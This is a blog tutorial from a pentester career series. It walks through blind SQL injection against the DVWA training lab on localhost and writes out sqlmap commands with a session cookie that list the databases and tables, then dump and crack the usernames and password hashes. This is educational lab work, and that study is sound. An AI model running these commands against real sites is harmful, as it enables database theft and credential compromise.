Contact Form

Name

Email *

Message *

Tips for an Information Security Analyst/Pentester career - Episode 12 (reviewed version): Blind SQL injection with DVWA

Last reviewed: 8/27/2017

Intro

We talked about SQL injection over the previous episode.

I manually inputted injection commands within input fields to crack the database.

However, this isn't the only, nor the best approach.

If we can't manually input the commands (input sanitation), or we want a faster approach, we can try a blind SQL injection attack.

In this case, we'll have a software run the SQL injection for us, instead of having to do it manually.


Prep

I enter a valid user id (3) in DVWA and click Submit.


We need the URL of the page we're in (shown below).


At that point, I grab the cookie session ID by right-clicking on an empty point in the page and clicking Page Info and then Security. 


Sqlmap execution

We launch the following command in Sqlmap:

sqlmap -u "localhost/dvwa/vulnerabilities/sqli_blind/?id=3&Submit=Submit"  --cookie="PHPSESSID=cd6943cmvuvu8v2c4hl77cqvp7; security=low;" --dump-all 

After retrieving all the information, sqlmap starts cracking the retrieved password hashes.

Then it dumps all this information to a file.

We can have a confirmation we're using a blind method by adding -v to the command, as shown below.


Afterward, we want to know the name of the database and we use following command:

sqlmap -u "localhost/dvwa/vulnerabilities/sqli_blind/?id=3&Submit=Submit"  --cookie="PHPSESSID=cd6943cmvuvu8v2c4hl77cqvp7; security=low;" --dbs

The command returns 7 available databases, as shown below.

 Now that we know the name of the database (dvwa), we can analyze its tables: sqlmap -u "localhost/dvwa/vulnerabilities/sqli_blind/?id=3&Submit=Submit" --cookie="PHPSESSID=cd6943cmvuvu8v2c4hl77cqvp7; security=low;" -D dvwa --tables

The command returns two tables. Apparently, user is the one we want to know more about.

Now, we want to have a look at the columns in the user table, and we run the following command:
sqlmap -u "localhost/dvwa/vulnerabilities/sqli_blind/?id=3&Submit=Submit" --cookie="PHPSESSID=cd6943cmvuvu8v2c4hl77cqvp7; security=low;" -T users --column
The command returns two interesting columns (user and password).


At this point, we want to extract information from these two columns and we run a new command for this purpose: 

sqlmap -u "localhost/dvwa/vulnerabilities/sqli_blind/?id=3&Submit=Submit"  --cookie="PHPSESSID=cd6943cmvuvu8v2c4hl77cqvp7; security=low;" -C user,password --dump


Results

Usernames and passwords are stored under /root/.sqlmap/output/localhost/dump/dvwa/users.csv

By opening it with Excel (under OS X), we can view all usernames and passwords for that specific database.


Wrap-up

Blind SQL injection can be an alternative and more insidious approach than the traditional SQL injection.

However, blind injection might also be slower than a manual method.

It's a kinda set-and-forget approach but that's the only alternative in case of input validation, where we can't use normal SQL injection attacks.


Comments

Related Posts Plugin for WordPress, Blogger...

Popular Posts